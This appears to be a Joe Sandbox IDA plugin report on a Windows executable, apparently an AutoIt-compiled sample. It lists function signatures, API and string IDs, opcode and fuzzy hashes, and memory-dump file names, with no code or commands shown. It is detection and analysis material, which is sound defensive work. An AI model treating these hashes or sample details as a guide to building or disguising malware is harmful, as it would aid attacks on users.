      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Type$Register$FileLoadModuleNameUser
      • String ID:
      • API String ID: 1352324309-0
      • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
      • Instruction ID: 718647d7a8fc1f825f74e6a1b618e72e26f0263acef25669c1cd4de8f545fe60
      • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
      • Instruction Fuzzy Hash: F1118266B0855293F7209F24E085369A3A1FBC8B48F944076D64D8B644CF7CD544FB20
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorLast$abort
      • String ID:
      • API String ID: 1447195878-0
      • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
      • Instruction ID: 5cb364f8912e7f5bf62300765a11978563c1d1053c91217495de34bbcb4b123e
      • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
      • Instruction Fuzzy Hash: FC018C2DB0934362FA68F7719517538E6519FC8798FD405B8F91E067E6DD2CE8007222
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CounterPerformanceQuerySleep
      • String ID:
      • API String ID: 2875609808-0
      • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
      • Instruction ID: e8d24ec66b7f410cefd421ffced1062c9ab68760d815941545913cc859eeaf21
      • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
      • Instruction Fuzzy Hash: 4A01F524A0CB8666FA16AB36944217BF364BFD8741F840376F94F61560DF2CE485F610
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
      • String ID:
      • API String ID: 1539411459-0
      • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
      • Instruction ID: aa7fb39a2724ebba8c6d69064a8ce4080e310cf9861a301112c4326c7489fca2
      • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
      • Instruction Fuzzy Hash: 0401B539A1879156F7005B16B80A729FB64BBC5F94F980174EF5A03BA1CF7DE841AB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CurrentOpenProcessThreadToken
      • String ID:
      • API String ID: 3974789173-0
      • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
      • Instruction ID: 303a34884d1c9985e3e2b161f6f717bdf7d983838995ef5089ba3af0789a399a
      • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
      • Instruction Fuzzy Hash: 51F0E529A19A0293FB406F21EC0636863E4BF98F84FC80074D80E82250EF3CD989B311
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CapsDesktopDeviceReleaseWindow
      • String ID:
      • API String ID: 2889604237-0
      • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
      • Instruction ID: 390830506d7b74e223d5b1f63801c4902224d71ed8948f3133fa48abc8993838
      • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
      • Instruction Fuzzy Hash: EEE04868F097029BF600BB62680D5389368AF85FD1F8044B0DD0F53B55DE3D50057710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CapsDesktopDeviceReleaseWindow
      • String ID:
      • API String ID: 2889604237-0
      • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
      • Instruction ID: 8c963574d803e3e01e673ec1fec4156b137a50f612a3055051520baaaa34df7a
      • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
      • Instruction Fuzzy Hash: 65E04F68B097029BFA00EB62A80D138A368AF89FD1F8040B0DD0F53B51DE3DA005B710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: gfffffff
      • API String ID: 3215553584-1523873471
      • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
      • Instruction ID: 72b15e6bc49205355fdab7c5c29d9b675fdae4259b05aee5741bd5b4cc881e54
      • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
      • Instruction Fuzzy Hash: 659189A6B0938696FB25EF25914937CAB95EBA17C0F448172CB8D07391DE3CE111F312
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ContainedObject
      • String ID: AutoIt3GUI$Container
      • API String ID: 3565006973-3941886329
      • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
      • Instruction ID: 336955781e82296fd3ce8500b5c4ee71b1ecae5fa9507b6421f601ca94889053
      • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
      • Instruction Fuzzy Hash: FD91273A604B4292EB14EF2AE4412ADB3B4FB88B94F918176DF8D43764EF39D445E310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: e+000$gfff
      • API String ID: 3215553584-3030954782
      • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
      • Instruction ID: 1617efaf3b8c9dcc84843e2ee2d3aa038a188560063e50b894e392cc8158c168
      • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
      • Instruction Fuzzy Hash: 50515766B193C25AF720DB349C42369EA91EBD0B90F8883B1C79C87BC6CE2CD040E711
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FileModuleName_invalid_parameter_noinfo
      • String ID: C:\Users\user\Desktop\elyho3x5zz.exe
      • API String ID: 3307058713-219561336
      • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
      • Instruction ID: 02aaab23e109005556109a877140f84ace6f7b40734394f334ab4c52e13a0985
      • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
      • Instruction Fuzzy Hash: 5A41C23AA08B42AAF714EF2598420B9E3A5EFC47C4BD54071E90E47B45DE3DE485F321
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$CreateDestroyMessageObjectSendStock
      • String ID: static
      • API String ID: 3467290483-2160076837
      • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
      • Instruction ID: 2ad7439e70f86d839d2baa58324f7162490876d6ea9d1c3f802ca101e85ceb85
      • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
      • Instruction Fuzzy Hash: C4416C365087C296E670AF21E4417AEF7A0FB84790F904235EBE903A99DB3DD481EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ByteCharMultiWidehtonsinet_addr
      • String ID: 255.255.255.255
      • API String ID: 2496851823-2422070025
      • Opcode ID: 6498537c2c3a5883a10926aadb8ba00fe171405f246142785e58ed521f6960e3
      • Instruction ID: b38f6629daa972f3342dd3a473e6ff2cd0acfcc8d2877d61f9c9ab21c8c623f0
      • Opcode Fuzzy Hash: 6498537c2c3a5883a10926aadb8ba00fe171405f246142785e58ed521f6960e3
      • Instruction Fuzzy Hash: 9331033AA08642A5FB10EB22E41227CB360FF94B98F858571EE5E433A1DE7CD445F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _snwprintf
      • String ID: , $$AUTOITCALLVARIABLE%d
      • API String ID: 3988819677-2584243854
      • Opcode ID: 7733e8ffdbc908513bc815d9413fe00ea9424621e57dd4bd42adfa79e2cf55fb
      • Instruction ID: 3d7c01b0e1b581d9986e3ff8e9856e34010719977737e7d8bcf36b7865b25463
      • Opcode Fuzzy Hash: 7733e8ffdbc908513bc815d9413fe00ea9424621e57dd4bd42adfa79e2cf55fb
      • Instruction Fuzzy Hash: 4A315B7AB08A02A5FB20EB65E4521BCB771FB85784B8041B6DE0D17659DF38E40AE360
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$CreateMessageObjectSendStock
      • String ID: $SysTabControl32
      • API String ID: 2080134422-3143400907
      • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
      • Instruction ID: 7b4308e6328bc74ae4dbb4510d07432de90b238e8a89b73f4ba2b027cf688c4b
      • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
      • Instruction Fuzzy Hash: D53197365087C1CAE720DF25E84479AB7A0F784BA4F544339EAA907AE8CB39D481DF10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FileHandleType
      • String ID: @
      • API String ID: 3000768030-2766056989
      • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
      • Instruction ID: e922025f556800431eb523a846e2111f9f6c02ab2860dfc69c1243d182263adf
      • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
      • Instruction Fuzzy Hash: CC21092AA09B4291FB60DB389C91138A650EBC5774FA51375D66F037D4CE3CD881F322
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$ColorCreateMessageObjectRectSendStock
      • String ID: static
      • API String ID: 1983116058-2160076837
      • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
      • Instruction ID: a93aa59dca682ad0b10f39af5bb18ed7f63aaade11278cd06904a73ba34f333f
      • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
      • Instruction Fuzzy Hash: B4316736A08781CBE324DF29E441B5AB7A5F788790F504279EB9943B99CB3DE841DF10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CreateObjectStockWindow
      • String ID: Combobox
      • API String ID: 1025951953-2096851135
      • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
      • Instruction ID: 7ff99428bc2c1cc261eb6651b3a093382a75c7ab9585dc3f1d397fd57fa9fa95
      • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
      • Instruction Fuzzy Hash: B2316A366087C1CBE3709F25B445B5AB7A1F784790F504274EAA803B99CB3DD841DF00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LengthMessageSendTextWindow
      • String ID: edit
      • API String ID: 2978978980-2167791130
      • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
      • Instruction ID: 902c828a88d5fab0114639dc8bb80ae486fe908dddde9206dbd819e6b1ad9016
      • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
      • Instruction Fuzzy Hash: 3F316B36A08781CAE770DB15E44475AB7A1F7C8790F504275EAAC43B99CB3DD881DF10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _handle_error
      • String ID: "$pow
      • API String ID: 1757819995-713443511
      • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
      • Instruction ID: c624dd2c2697859bf22e41a12912b9f9f1dec02c9ddd77d0c5cd618449ed9dfb
      • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
      • Instruction Fuzzy Hash: 54218B76D1CAC593E370DF14E041A6AFAA0FBDA344F602336F68906A55CBBDD081AB11
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassMessageNameSend
      • String ID: ComboBox$ListBox
      • API String ID: 3678867486-1403004172
      • Opcode ID: ac0540a302cdf1ebfe95abca1fa66a181e3f92b28f90b6137b09374f88272cc8
      • Instruction ID: 4952452b34ca10a13293ac60846849d933f106820211bab156b3f0ed65b42a88
      • Opcode Fuzzy Hash: ac0540a302cdf1ebfe95abca1fa66a181e3f92b28f90b6137b09374f88272cc8
      • Instruction Fuzzy Hash: 7F11056AA08780A1F710EB10D0420F9B7A0FFC5BA0F844271DAAC477D9DE3CD105E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
